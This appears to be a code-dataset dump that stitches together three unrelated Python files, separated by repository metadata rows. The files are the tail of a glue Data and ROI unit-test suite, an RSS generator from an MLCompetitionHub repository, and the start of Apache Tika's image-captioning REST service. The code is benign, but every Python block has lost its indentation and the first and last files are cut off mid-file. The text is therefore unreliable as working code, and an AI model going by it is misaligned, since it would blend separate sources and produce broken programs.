np.testing.assert_array_equal(w1, w1prime)
np.testing.assert_array_equal(p0, p0prime)
np.testing.assert_array_equal(p1, p1prime)
def test_coordinate_links_empty_data(self):
d = Data()
d.coords = None
assert d.coordinate_links == []
def test_coordinate_links_idempotent(self):
"""Should only calculate links once, and
return the same objects every time"""
links = self.data.coordinate_links
links2 = self.data.coordinate_links
assert links == links2
def test_fancy_view(self):
result = self.data[self.comp_id, :, 2]
np.testing.assert_array_equal(result, self.data[self.comp_id][:, 2])
def test_get_by_string(self):
result = self.data['Test Component']
assert result is self.comp.data
def test_get_by_missing_string(self):
with pytest.raises(IncompatibleAttribute) as exc:
result = self.data['xyz']
assert exc.value.args[0] == 'xyz'
def test_immutable(self):
d = Data(x=[1, 2, 3])
with pytest.raises(ValueError) as exc:
d['x'][:] = 5
assert 'read-only' in exc.value.args[0]
assert not d['x'].flags['WRITEABLE']
@pytest.mark.xfail
def test_categorical_immutable(self):
d = Data()
c = CategoricalComponent(['M', 'M', 'F'], categories=['M', 'F'])
d.add_component(c, label='gender')
with pytest.raises(ValueError) as exc:
d['gender'][:] = 5
assert 'read-only' in exc.value.args[0]
assert not d['gender'].flags['WRITEABLE']
def test_update_clears_subset_cache(self):
from ..roi import RectangularROI
d = Data(x=[1, 2, 3], y=[1, 2, 3])
s = d.new_subset()
state = core.subset.RoiSubsetState()
state.xatt = d.id['x']
state.yatt = d.id['y']
state.roi = RectangularROI(xmin=1.5, xmax=2.5, ymin=1.5, ymax=2.5)
s.subset_state = state
np.testing.assert_array_equal(s.to_mask(), [False, True, False])
d.update_components({d.id['x']: [10, 20, 30]})
np.testing.assert_array_equal(s.to_mask(), [False, False, False])
def test_add_derived_implicit(self):
# Regression test for a bug that caused derived components added via
# the data[...] = ... syntax to have links that did not include a 'to'
# argument, leading the link manager to add a ghost component to the
# data.
from ..data_collection import DataCollection
dc = DataCollection([])
data = Data(x=[1, 2, 3], y=[2, 3, 4], label='data1')
dc.append(data)
data['z'] = data.id['x'] + 1
# There should be four components: x, y, z, and pixel
assert len(data.components) == 4
def test_remove_derived_dependency(self):
# Regression test for a bug that occurred when removing a component
# used in a derived component, which should also remove the derived
# component itself. To make things more fun, we set up a chain of
# derived components to make sure they are all removed.
data = Data(a=[1, 2, 3], b=[2, 3, 4], label='data1')
data['c'] = data.id['a'] + 1
data['d'] = data.id['c'] + 1
data['e'] = data.id['d'] + 1
data['f'] = data.id['e'] + 1
a_id = data.id['a']
b_id = data.id['b']
c_id = data.id['c']
d_id = data.id['d']
e_id = data.id['e']
f_id = data.id['f']
# There should be seven components: pixel, a, b, c, d, e, f
assert len(data.components) == 7
data.remove_component(data.id['d'])
# This should also remove e and f since they depend on d
assert len(data.components) == 4
assert a_id in data.components
assert b_id in data.components
assert c_id in data.components
assert d_id not in data.components
assert e_id not in data.components
assert f_id not in data.components
def test_links_property(self):
data = Data(a=[1, 2, 3], b=[2, 3, 4], label='data1',
coords=IdentityCoordinates(n_dim=1))
assert len(data.links) == 2
assert isinstance(data.links[0], CoordinateComponentLink)
assert isinstance(data.links[1], CoordinateComponentLink)
data['c'] = data.id['a'] + 1
assert len(data.links) == 3
assert isinstance(data.links[2], BinaryComponentLink)
class TestROICreation(object):
def test_range_roi(self):
d = Data(xdata=[1, 2, 3], ydata=[1, 2, 3])
comp = d.get_component(d.id['xdata'])
roi = RangeROI('x', min=2, max=3)
s = roi_to_subset_state(roi, x_att='xdata')
assert isinstance(s, RangeSubsetState)
np.testing.assert_array_equal((s.lo, s.hi),
[2, 3])
roi = RangeROI('y', min=2, max=3)
s = roi_to_subset_state(roi,
x_att='xdata',
y_att='ydata')
assert isinstance(s, RangeSubsetState)
assert s.att == 'ydata'
def test_range_roi_categorical(self):
d = Data(x=['a', 'b', 'c'], y=[1, 2, 3])
comp = d.get_component(d.id['x'])
roi = CategoricalROI(['b', 'c'])
s = roi_to_subset_state(roi, x_att=d.id['x'], x_categories=comp.categories)
assert isinstance(s, CategoricalROISubsetState)
np.testing.assert_array_equal((s.roi.contains(['a', 'b', 'c'], None)),
[False, True, True])
roi = RangeROI('x', min=1, max=3)
s = roi_to_subset_state(roi, x_att='x', x_categories=comp.categories)
assert isinstance(s, CategoricalROISubsetState)
np.testing.assert_array_equal((s.roi.contains(['a', 'b', 'c'], None)),
[False, True, True])
def test_polygon_roi(self):
d = Data(x=[1, 1.3, 3, 10], y=[1, 1.5, 3, 10])
roi = PolygonalROI([0, 0, 2, 2], [0, 2, 2, 0])
s = roi_to_subset_state(roi, x_att=d.id['x'], y_att=d.id['y'])
assert isinstance(s, RoiSubsetState)
np.testing.assert_array_equal(s.to_mask(d), [True, True, False, False])
def test_polygon_categorical_rectangular(self):
d = Data(x=[1, 1.3, 3, 10], y=['a', 'b', 'c', 'd'])
y_comp = d.get_component(d.id['y'])
roi = PolygonalROI([0, 0, 2, 2], [0, 2, 2, 0])
s = roi_to_subset_state(roi, x_att='x', y_att='y', y_categories=y_comp.categories)
assert isinstance(s, CategoricalMultiRangeSubsetState)
np.testing.assert_array_equal(s.to_mask(d), [True, True, False, False])
def test_polygon_categorical_arbitrary(self):
d = Data(x=[1, 1.3, 3, 10], y=['a', 'b', 'c', 'd'])
y_comp = d.get_component(d.id['y'])
roi = PolygonalROI([0, 4, 4, 1, 0], [-0.5, 3.5, 0, -1, -0.5])
s = roi_to_subset_state(roi, x_att='x', y_att='y', y_categories=y_comp.categories)
assert isinstance(s, CategoricalMultiRangeSubsetState)
np.testing.assert_array_equal(s.to_mask(d), [True, False, True, False])
def test_rectangular_categorical(self):
d = Data(x=[1, 1.3, 3, 10], y=['a', 'b', 'c', 'd'])
x_comp = d.get_component(d.id['x'])
y_comp = d.get_component(d.id['y'])
roi = RectangularROI(xmin=-0.1, xmax=2.1, ymin=-0.1, ymax=2.1)
s = roi_to_subset_state(roi, x_att='x', y_att='y', y_categories=y_comp.categories)
assert isinstance(s, AndState)
np.testing.assert_array_equal(s.to_mask(d), [True, True, False, False])
s = roi_to_subset_state(roi, x_att='x', y_att='y', y_categories=y_comp.categories)
assert isinstance(s, AndState)
np.testing.assert_array_equal(s.to_mask(d), [True, True, False, False])
def test_polygon_both_categorical_arbitrary(self):
d = Data(x=['a', 'b', 'c', 'd', 'b', 'c'], y=['p', 'q', 'r', 's', 's', 'q'])
x_comp = d.get_component(d.id['x'])
y_comp = d.get_component(d.id['y'])
roi = PolygonalROI([0.5, 1.5, 2.5, 1, 0.5], [0.5, 0.5, 2.5, 3.5, 0.5])
s = roi_to_subset_state(roi,
x_att='x', x_categories=x_comp.categories,
y_att='y', y_categories=y_comp.categories)
assert isinstance(s, CategoricalROISubsetState2D)
np.testing.assert_array_equal(s.to_mask(d), [False, True, True, False, True, False])
def test_polygon_both_categorical_empty(self):
d = Data(x=['a', 'b', 'c', 'd', 'b', 'c'], y=['p', 'q', 'r', 's', 's', 'q'])
x_comp = d.get_component(d.id['x'])
y_comp = d.get_component(d.id['y'])
roi = PolygonalROI([0.5, 0.6, 0.6, 0.5], [0.5, 0.5, 0.6, 0.5])
s = roi_to_subset_state(roi,
x_att='x', x_categories=x_comp.categories,
y_att='y', y_categories=y_comp.categories)
assert isinstance(s, CategoricalROISubsetState2D)
np.testing.assert_array_equal(s.to_mask(d), [False, False, False, False, False, False])
def test_component_id_item_access():
data = Data()
c1 = Component(np.array([1, 2, 3]))
data.add_component(c1, 'values')
c2 = Component(np.array([4., 5., 6.]))
data.add_component(c2, 'Flux')
assert data.id['values'] == data.find_component_id('values')
assert data.id['Flux'] == data.find_component_id('Flux')
def test_component_id_item_access_missing():
"""id attribute should raise KeyError if requesting a bad ComponentID"""
data = Data()
with pytest.raises(KeyError):
data.id['not found']
class TestPixelLabel(object):
def test(self):
assert pixel_label(0, 2) == "0 [y]"
assert pixel_label(1, 2) == "1 [x]"
assert pixel_label(0, 3) == "0 [z]"
assert pixel_label(1, 3) == "1 [y]"
assert pixel_label(2, 3) == "2 [x]"
assert pixel_label(1, 0) == "1"
assert pixel_label(1, 4) == "1"
@pytest.mark.parametrize(('kwargs'),
[{'x': [1, 2, 3]},
{'x': np.array([1, 2, 3])},
{'x': [[1, 2, 3], [2, 3, 4]]},
{'x': [1, 2], 'y': [2, 3]}])
def test_init_with_inputs(kwargs):
"""Passing array-like objects as keywords to Data
auto-populates Components with label names = keywords"""
d = Data(**kwargs)
for label, data in kwargs.items():
np.testing.assert_array_equal(d[d.id[label]], data)
def test_init_with_invalid_kwargs():
with pytest.raises(ValueError) as exc:
d = Data(x=[1, 2], y=[1, 2, 3])
assert exc.value.args[0].startswith('The dimensions of component')
def test_getitem_with_component_link():
d = Data(x=[1, 2, 3, 4])
y = d.id['x'] * 5
np.testing.assert_array_equal(d[y], [5, 10, 15, 20])
def test_getitem_with_component_link_and_slice():
d = Data(x=[1, 2, 3, 4])
y = d.id['x'] * 5
np.testing.assert_array_equal(d[y, ::2], [5, 15])
def test_add_link_with_binary_link():
d = Data(x=[1, 2, 3, 4], y=[4, 5, 6, 7])
z = d.id['x'] + d.id['y']
d.add_component_link(z, 'z')
np.testing.assert_array_equal(d[d.id['z']], [5, 7, 9, 11])
def test_foreign_pixel_components_not_in_visible():
"""Pixel components from other data should not be visible"""
# currently, this is trivially satisfied since all coordinates are hidden
d1 = Data(x=[1], y=[2], coords=IdentityCoordinates(n_dim=1))
d2 = Data(w=[3], v=[4], coords=IdentityCoordinates(n_dim=1))
dc = DataCollection([d1, d2])
dc.add_link(LinkSame(d1.id['x'], d2.id['w']))
dc.add_link(LinkSame(d1.world_component_ids[0],
d2.world_component_ids[0]))
assert d2.pixel_component_ids[0] not in d1.main_components
np.testing.assert_array_equal(d1[d2.pixel_component_ids[0]], [0])
def test_add_binary_component():
d = Data(x=[1, 2, 3], y=[2, 3, 4])
z = d.id['x'] + d.id['y']
d.add_component(z, label='z')
np.testing.assert_array_equal(d['z'], [3, 5, 7])
EXPECTED_STR = """
Data Set: mydata
Number of dimensions: 1
Shape: 3
Main components:
- x
- y
Coordinate components:
- Pixel Axis 0 [x]
""".strip()
def test_data_str():
# Regression test for Data.__str__
d = Data(x=[1, 2, 3], y=[2, 3, 4], label='mydata')
assert str(d) == EXPECTED_STR
EXPECTED_STR_WITH_DERIVED = """
Data Set: mydata
Number of dimensions: 1
Shape: 3
Main components:
- x
- y
Derived components:
- z
Coordinate components:
- Pixel Axis 0 [x]
""".strip()
def test_data_str_with_derived():
d = Data(x=[1, 2, 3], y=[2, 3, 4], label='mydata')
d['z'] = d.id['x'] + 1
assert str(d) == EXPECTED_STR_WITH_DERIVED
def test_update_values_from_data():
d1 = Data(a=[1, 2, 3], b=[4, 5, 6], label='banana')
d2 = Data(b=[1, 2, 3, 4], c=[5, 6, 7, 8], label='apple')
d1a = d1.id['a']
d1b = d1.id['b']
d2b = d2.id['b']
d2c = d2.id['c']
d1.update_values_from_data(d2)
assert d1a not in d1.components
assert d1b in d1.components
assert d2b not in d1.components
assert d2c not in d1.components
assert [cid.label for cid in d1.main_components] == ['b', 'c']
assert d1.shape == (4,)
def test_update_values_from_data_invalid():
d1 = Data(a=[1, 2, 3], label='banana')
d1.add_component([3, 4, 5], 'a')
d2 = Data(b=[1, 2, 3, 4], c=[5, 6, 7, 8], label='apple')
with pytest.raises(ValueError) as exc:
d1.update_values_from_data(d2)
assert exc.value.args[0] == "Non-unique component labels in original data"
d1 = Data(a=[1, 2, 3], b=[4, 5, 6], label='banana')
d2 = Data(b=[1, 2, 3, 4], label='apple')
d2.add_component([5, 6, 7, 8], 'b')
with pytest.raises(ValueError) as exc:
d1.update_values_from_data(d2)
assert exc.value.args[0] == "Non-unique component labels in new data"
def test_update_values_from_data_order():
# Make sure that the order of components is preserved when calling
# Data.update_values_from_data. The final order should be first
# components that existed before, followed by new components
d1 = Data()
d1['c'] = [1, 2, 3]
d1['b'] = [2, 3, 4]
d1['j'] = [0, 1, 2]
d1['a'] = [4, 4, 4]
d1['f'] = [4, 5, 6]
d2 = Data()
d2['h'] = [4, 4, 4]
d2['j'] = [0, 1, 2]
d2['a'] = [4, 4, 4]
d2.update_values_from_data(d1)
assert [cid.label for cid in d2.main_components] == ['j', 'a', 'c', 'b', 'f']
def test_find_component_id_with_cid():
# Regression test for a bug that caused Data.find_component_id to return
# True erroneously when passing a component ID.
d1 = Data()
d1['a'] = ['a', 'b', 'c']
d1['b'] = [1, 2, 3]
assert d1.find_component_id(d1.id['a']) is d1.id['a']
assert d1.find_component_id(d1.id['b']) is d1.id['b']
def test_parent_preserved_session():
# Regression test for a bug that caused ComponentID parents to not be
# preserved when saving and restoring a session.
from ..link_helpers import LinkSame
from ..data_collection import DataCollection
d1 = Data(x=[1], y=[2], label='test1')
d2 = Data(w=[3], v=[4], label='test2')
dc = DataCollection([d1, d2])
dc.add_link(LinkSame(d1.id['x'], d2.id['w']))
assert d1.id['x'].parent is d1
assert d1.id['y'].parent is d1
assert d2.id['w'].parent is d2
assert d2.id['v'].parent is d2
dc2 = clone(dc)
assert dc2[0].id['x'].parent.label == 'test1'
assert dc2[0].id['y'].parent.label == 'test1'
assert dc2[1].id['w'].parent.label == 'test2'
assert dc2[1].id['v'].parent.label == 'test2'
def test_preserve_datetime():
# Make sure that we recognize and preserve the Numpy datetime64 format
dates = np.array([1, 2, 3], dtype='M8[D]')
data = Data(dates=dates)
assert isinstance(data.get_component('dates'), DateTimeComponent)
def test_clone_meta():
# Regression test for a bug that caused metadata to not be preserved
# when saving/loading sessions.
class CustomObject(object):
pass
data1 = Data(x=[1, 2, 3])
data1.meta['a'] = 1
data1.meta['b'] = 'test'
data1.meta['c'] = CustomObject()
data2 = clone(data1)
assert data2.meta['a'] == 1
assert data2.meta['b'] == 'test'
assert 'c' not in data2.meta
def test_update_coords():
# Make sure that when overriding coords, the world coordinate components
# are updated.
data1 = Data(x=[1, 2, 3], coords=IdentityCoordinates(n_dim=1))
assert len(data1.components) == 3
assert_equal(data1[data1.world_component_ids[0]], [0, 1, 2])
data2 = Data(x=[1, 2, 3], coords=IdentityCoordinates(n_dim=1))
assert len(data1.links) == 2
assert len(data2.links) == 2
data_collection = DataCollection([data1, data2])
assert len(data_collection.links) == 4
data_collection.add_link(LinkSame(data1.world_component_ids[0], data2.world_component_ids[0]))
assert len(data_collection.links) == 5
class CustomCoordinates(Coordinates):
def __init__(self):
super().__init__(pixel_n_dim=1, world_n_dim=1)
@property
def world_axis_names(self):
return ['Custom {0}'.format(axis) for axis in range(3)]
def world_to_pixel_values(self, *world):
if self.pixel_n_dim == 1:
return 0.4 * world[0]
else:
return tuple([0.4 * w for w in world])
def pixel_to_world_values(self, *pixel):
if self.world_n_dim == 1:
return 2.5 * pixel[0]
else:
return tuple([2.5 * p for p in pixel])
data1.coords = CustomCoordinates()
assert len(data1.components) == 3
assert_equal(data1[data1.world_component_ids[0]], [0, 2.5, 5])
assert sorted(cid.label for cid in data1.world_component_ids) == ['Custom 0']
# The link between the two world coordinates should be remove
assert len(data_collection.links) == 4
def test_compute_statistic_subset():
data = Data(x=list(range(10)))
result = data.compute_statistic('mean', data.id['x'], subset_state=data.id['x'] > 5)
assert_allclose(result, 7.5)
subset_state = SliceSubsetState(data, [slice(5)])
result = data.compute_statistic('mean', data.id['x'], subset_state=subset_state)
assert_allclose(result, 2.0)
@pytest.mark.parametrize('shape', (100, (30, 10), (500, 1, 30)))
def test_compute_statistic_chunks(shape):
# Make sure that when using chunks, the result is the same as without.
data = Data(x=np.random.random(shape))
axis = tuple(range(data.ndim - 1))
assert_allclose(data.compute_statistic('mean', data.id['x'], axis=axis),
data.compute_statistic('mean', data.id['x'], axis=axis, n_chunk_max=10))
subset_state = SliceSubsetState(data, [slice(5)])
stats = data.compute_statistic('mean', data.id['x'], axis=axis, subset_state=subset_state)
chunked = data.compute_statistic('mean', data.id['x'], axis=axis, subset_state=subset_state,
n_chunk_max=10)
assert_allclose(stats, chunked)
subset_state = data.id['x'] > 0.25
stats = data.compute_statistic('mean', data.id['x'], axis=axis, subset_state=subset_state)
chunked = data.compute_statistic('mean', data.id['x'], axis=axis, subset_state=subset_state,
n_chunk_max=10)
assert_allclose(stats, chunked)
roi = RangeROI('x', min=0.1, max=0.95)
subset_state = roi_to_subset_state(roi, x_att='x')
stats = data.compute_statistic('mean', data.id['x'], axis=axis, subset_state=subset_state)
chunked = data.compute_statistic('mean', data.id['x'], axis=axis, subset_state=subset_state,
n_chunk_max=10)
assert_allclose(stats, chunked)
if data.ndim < 3:
return
assert_allclose(data.compute_statistic('mean', data.id['x'], axis=2),
data.compute_statistic('mean', data.id['x'], axis=2, n_chunk_max=10))
subset_state = SliceSubsetState(data, [slice(5)])
stats = data.compute_statistic('mean', data.id['x'], axis=2, subset_state=subset_state)
chunked = data.compute_statistic('mean', data.id['x'], axis=2, subset_state=subset_state,
n_chunk_max=10)
assert_allclose(stats, chunked)
subset_state = data.id['x'] > 0.25
stats = data.compute_statistic('mean', data.id['x'], axis=2, subset_state=subset_state)
chunked = data.compute_statistic('mean', data.id['x'], axis=2, subset_state=subset_state,
n_chunk_max=10)
assert_allclose(stats, chunked)
roi = RangeROI('x', min=0.1, max=0.95)
subset_state = roi_to_subset_state(roi, x_att='x')
stats = data.compute_statistic('mean', data.id['x'], axis=2, subset_state=subset_state)
chunked = data.compute_statistic('mean', data.id['x'], axis=2, subset_state=subset_state,
n_chunk_max=10)
assert_allclose(stats, chunked)
def test_compute_statistic_random_subset():
data = Data(x=list(range(10)))
with NumpyRNGContext(12345):
result = data.compute_statistic('mean', data.id['x'], random_subset=5)
assert_allclose(result, 4.2)
result = data.compute_statistic('mean', data.id['x'], random_subset=5,
subset_state=MaskSubsetState([0, 1, 0, 1, 1, 1, 0, 1, 0, 1],
data.pixel_component_ids))
assert_allclose(result, 5)
def test_compute_statistic_empty_subset():
data = Data(x=np.empty((30, 20, 40)))
# A default subset state should be empty
subset_state = SubsetState()
result = data.compute_statistic('mean', data.id['x'], subset_state=subset_state)
assert_equal(result, np.nan)
result = data.compute_statistic('maximum', data.id['x'], subset_state=subset_state, axis=1)
assert_equal(result, np.broadcast_to(np.nan, (30, 40)))
result = data.compute_statistic('median', data.id['x'], subset_state=subset_state, axis=(1, 2))
assert_equal(result, np.broadcast_to(np.nan, (30)))
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state, axis=(0, 1, 2))
assert_equal(result, np.nan)
def test_compute_statistic_efficient():
# Unit test to test the logic for dealing with accessing only a minimal
# region from the data based on the smallest array that covers a given
# subset state.
array = np.ones(10 * 20 * 30 * 40).reshape((10, 20, 40, 30))
array[3:5, 6:14, :, 10:21:2] += 1
class CustomData(Data):
def get_data(self, cid, view=None):
if cid.label == 'x':
self.elements_accessed = np.ones(self.shape)[view].sum()
else:
self.elements_accessed = 0
return super().get_data(cid, view=view)
data = CustomData(x=array, y=array)
subset_state = data.id['y'] > 1.5
# First test without view
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state)
assert_allclose(result, 7680)
assert data.elements_accessed == 7040
# Now apply a view which includes just one slice that covers the original area
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state,
view=[slice(0, 5)])
assert_allclose(result, 7680)
assert data.elements_accessed == 7040
# Make it so that the slice doesn't fully overlap with the subset
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state,
view=[slice(0, 4)])
assert_allclose(result, 3840)
assert data.elements_accessed == 3520
# And now make it so there is no overlap
# TODO: should this result be 0 instead of nan?
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state,
view=[slice(0, 3)])
assert_allclose(result, np.nan)
assert data.elements_accessed == 0
# Check what happens if we use an integer index that overlaps...
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state,
view=[3])
assert_allclose(result, 3840)
assert data.elements_accessed == 3520
# ... and one that doesn't
# TODO: should this result be 0 instead of nan?
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state,
view=[2])
assert_allclose(result, np.nan)
assert data.elements_accessed == 0
# Now try using a slice that has a step>1 - this should actually then
# bypass the efficient algorithm
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state,
view=[slice(0, 5, 2)])
assert_allclose(result, 3840)
assert data.elements_accessed == 72000
# Finally we can do a complex mix of options
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state,
view=(slice(0, 5), slice(3, 10), 20, slice(None)))
assert_allclose(result, 96)
assert data.elements_accessed == 88
def test_compute_statistic_shape():
# The compute_statistic method has some code that helps it be more efficient
# with subsets, but we need to make sure that the final result has the same
# shape as if we didn't have those optimizations.
array = np.ones(10 * 20 * 30).reshape((10, 20, 30))
array[3:5, 6:14, 10:21] += 1
data = Data(x=array, y=array)
subset_state = data.id['y'] > 1.5
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state)
assert np.isscalar(result)
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state,
axis=1)
assert result.shape == (10, 30)
result = data.compute_statistic('sum', data.id['x'], subset_state=subset_state,
axis=(0, 2))
assert result.shape == (20,)
@pytest.mark.parametrize('view', ((slice(0, 5), slice(4, 14), slice(10, 22)),
(slice(0, 6), slice(4, 12), slice(0, 16)),
(slice(2, 5), slice(6, 12), slice(10, 20))))
def test_compute_statistic_shape_view(view):
# Test the compute_statistic method with the same optimizations and combined
# with different settings of the `view` parameter for sub-slicing the dataset.
array = np.ones((10, 20, 30))
array[3:5, 6:14, 10:21] += 1
data = Data(x=array, y=array)
state = data.id['y'] > 1.5
result = data.compute_statistic('sum', data.id['x'], subset_state=state, view=view)
assert np.isscalar(result)
result = data.compute_statistic('sum', data.id['x'], subset_state=state, view=view, axis=1)
assert result.shape == (view[0].stop - view[0].start, view[2].stop - view[2].start)
result = data.compute_statistic('sum', data.id['x'], subset_state=state, view=view, axis=(0, 2))
assert result.shape == (view[1].stop - view[1].start,)
roi = RangeROI('x', min=1.5, max=2.0)
state = roi_to_subset_state(roi, x_att='x')
result = data.compute_statistic('sum', data.id['x'], subset_state=state, view=view)
assert np.isscalar(result)
result = data.compute_statistic('sum', data.id['x'], subset_state=state, view=view, axis=1)
assert result.shape == (view[0].stop - view[0].start, view[2].stop - view[2].start)
result = data.compute_statistic('sum', data.id['x'], subset_state=state, view=view, axis=(0, 2))
assert result.shape == (view[1].stop - view[1].start,)
def test_compute_histogram_log():
# Make sure that the returned histogram is NaN everywhere if either of the
# limits are negative in log mode
data = Data(x=np.ones(10), y=np.ones(10))
result = data.compute_histogram([data.id['x']], range=[[0.5, 2.5]], bins=[2])
assert_allclose(result, [10, 0])
data = Data(x=np.ones(10), y=np.ones(10))
result = data.compute_histogram([data.id['x']], range=[[0.5, 2.5]], bins=[2], log=[True])
assert_allclose(result, [10, 0])
data = Data(x=np.ones(10), y=np.ones(10))
result = data.compute_histogram([data.id['x']], range=[[-0.5, 2.5]], bins=[2], log=[True])
assert result.shape == (2,) and np.sum(result) == 0
data = Data(x=np.ones(10), y=np.ones(10))
result = data.compute_histogram([data.id['x'], data.id['y']], range=[[-0.5, 3], [-3, 5]], bins=[2, 3], log=[True, True])
assert result.shape == (2, 3) and np.sum(result) == 0
data = Data(x=np.ones(10), y=np.ones(10))
result = data.compute_histogram([data.id['x'], data.id['y']], range=[[1, 3], [-3, 5]], bins=[2, 3], log=[True, True])
assert result.shape == (2, 3) and np.sum(result) == 0
def test_compute_histogram_dask():
# Make sure that compute_histogram works for dask arrays
da = pytest.importorskip('dask.array')
data = Data(x=da.arange(10))
result = data.compute_histogram([data.id['x']], range=[[-0.5, 11.75]], bins=[2])
assert_allclose(result, [6, 4])
result = data.compute_histogram([data.id['x']], range=[[-0.5, 11.25]], bins=[2], subset_state=data.id['x'] > 4.5)
assert_allclose(result, [1, 4])
def test_compute_histogram_dask_mixed():
# Make sure that compute_histogram works when mixing dask and non-dask arrays
da = pytest.importorskip('dask.array')
data = Data(x=da.arange(10), y=np.arange(10))
result = data.compute_histogram([data.id['y'], data.id['x']], range=[[-0.5, 11.75], [-0.5, 11.75]], bins=[2, 3])
assert_allclose(result, [[4, 2, 0], [0, 2, 2]])
result = data.compute_histogram([data.id['y'], data.id['x']], range=[[-0.5, 11.25], [-0.5, 11.25]], bins=[2, 3], subset_state=data.id['x'] > 4.5)
assert_allclose(result, [[0, 1, 0], [0, 2, 2]])
|
c9e9098fd50f2a7982d629874a4cd4f05531a92b
|
450b551bd5f5c99bcf175ebdd114ecfb55788f3e
|
/actions/rss.py
|
5b5ca43ebcc509e6a6da0a415f076970f162c054
|
[] |
no_license
|
LogicJake/MLCompetitionHub
|
2482f8ce3ac7eb9d46a5fc62fa92147405cb1561
|
ab5e68b5aa424b98bd9ea98cf094b35bd12bb49d
|
refs/heads/master
| 2023-09-03T17:54:33.843632
| 2023-09-03T08:01:13
| 2023-09-03T08:01:13
| 234,690,463
| 144
| 27
| null | 2023-05-22T22:38:21
| 2020-01-18T06:10:35
|
Python
|
UTF-8
|
Python
| false
| false
| 1,603
|
py
|
rss.py
|
import copy
from datetime import datetime, timedelta
from xml.sax.saxutils import escape
from jinja2 import Environment, PackageLoader
STANDARD_TIME_FORMAT = '%Y-%m-%dT%H:%M:%S+08:00'
def generate(datas_):
datas = copy.deepcopy(datas_)
for data in datas:
for c in data['competitions']:
start_time = c['start_time']
deadline = c['deadline']
description = c['description']
reward = c['reward']
# 转为标准时间格式字符串
if start_time is None:
start_time = '未给出具体时间'
else:
start_time = start_time.strftime(STANDARD_TIME_FORMAT)
if deadline is None:
deadline = '未给出具体时间'
else:
deadline = deadline.strftime(STANDARD_TIME_FORMAT)
content = '<h3>Description</h3>{}<h3>Deadline: {}</h3><h3>Reward: {}</h3>'.format(
escape(description), deadline, reward)
c['start_time'] = start_time
c['deadline'] = deadline
c['content'] = content
c['name'] = escape(c['name'])
c['description'] = escape(c['description'])
c['url'] = escape(c['url'])
update = datetime.utcnow() + timedelta(hours=8)
update = update.strftime(STANDARD_TIME_FORMAT)
# 生成 RSS
env = Environment(loader=PackageLoader('actions'))
template = env.get_template('rss.j2')
content = template.render(datas=datas, update=update)
with open('docs/rss.xml', 'w') as f:
f.write(content)
|
44407a1ec8d31f1c81dd3a96b91fe7fa904f74d1
|
6636854f8d55c1cb9dc8d55a9ba4e01d17c360f1
|
/tika-parsers/tika-parsers-ml/tika-parser-advancedmedia-module/src/main/resources/org/apache/tika/parser/captioning/tf/im2txtapi.py
|
97f1f2afd642da9589e3c4338e95d2f1a07cad83
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0",
"LicenseRef-scancode-unknown",
"EPL-1.0",
"ICU",
"LicenseRef-scancode-bsd-simplified-darwin",
"MPL-2.0",
"LicenseRef-scancode-iptc-2006",
"LicenseRef-scancode-proprietary-license",
"MIT",
"NetCDF",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-unrar",
"Classpath-exception-2.0",
"LGPL-2.1-or-later",
"CDDL-1.0",
"CDDL-1.1",
"GPL-2.0-only"
] |
permissive
|
apache/tika
|
ff4fe69a76a3c84f947223fe9b806045ee693f71
|
40910015849aba5a57e59ad0f3aeff803744f3ab
|
refs/heads/main
| 2023-08-31T11:19:31.578196
| 2023-08-31T06:12:10
| 2023-08-31T06:12:10
| 206,427
| 1,817
| 856
|
Apache-2.0
| 2023-09-14T19:27:42
| 2009-05-21T02:12:11
|
Java
|
UTF-8
|
Python
| false
| false
| 8,997
|
py
|
im2txtapi.py
|
#!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This script exposes image captioning service over a REST API. Image captioning implementation based on the paper,
"Show and Tell: A Neural Image Caption Generator"
Oriol Vinyals, Alexander Toshev, Samy Bengio, Dumitru Erhan
For more details, please visit :
http://arxiv.org/abs/1411.4555
Requirements :
Flask
tensorflow
numpy
requests
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import logging
import math
import requests
import sys
from flask import Flask, request, Response, jsonify
from io import BytesIO
from PIL import Image
from time import time
import tensorflow as tf
import xml.etree.ElementTree as ET
import model_wrapper
import vocabulary
import caption_generator
# turning off the traceback by limiting its depth
sys.tracebacklimit = 0
# informative log messages for advanced users to troubleshoot errors when modifying model_info.xml
try:
info = ET.parse('/usr/share/apache-tika/models/dl/image/caption/model_info.xml').getroot()
except IOError:
logging.exception('model_info.xml is not found')
sys.exit(1)
model_main = info.find('model_main')
if model_main is None:
logging.exception('<checkpoint_path> tag under <model_main> tag in model_info.xml is not found')
sys.exit(1)
checkpoint_path = model_main.find('checkpoint_path')
if checkpoint_path is None:
logging.exception('<checkpoint_path> tag under <model_main> tag in model_info.xml is not found')
sys.exit(1)
else:
checkpoint_path = checkpoint_path.text
vocab_file = model_main.find('vocab_file')
if vocab_file is None:
logging.exception('<vocab_file> tag under <model_main> tag in model_info.xml is not found')
sys.exit(1)
else:
vocab_file = vocab_file.text
port = info.get('port')
if port is None:
logging.exception('port attribute in <service> tag in model_info.xml is not found')
sys.exit(1)
# turning on the traceback by setting it to default
sys.tracebacklimit = 1000
FLAGS = tf.flags.FLAGS
tf.flags.DEFINE_string("checkpoint_path", checkpoint_path, """Directory containing the model checkpoint file.""")
tf.flags.DEFINE_string('vocab_file', vocab_file, """Text file containing the vocabulary.""")
tf.flags.DEFINE_integer('port', port, """Server PORT, default:8764""")
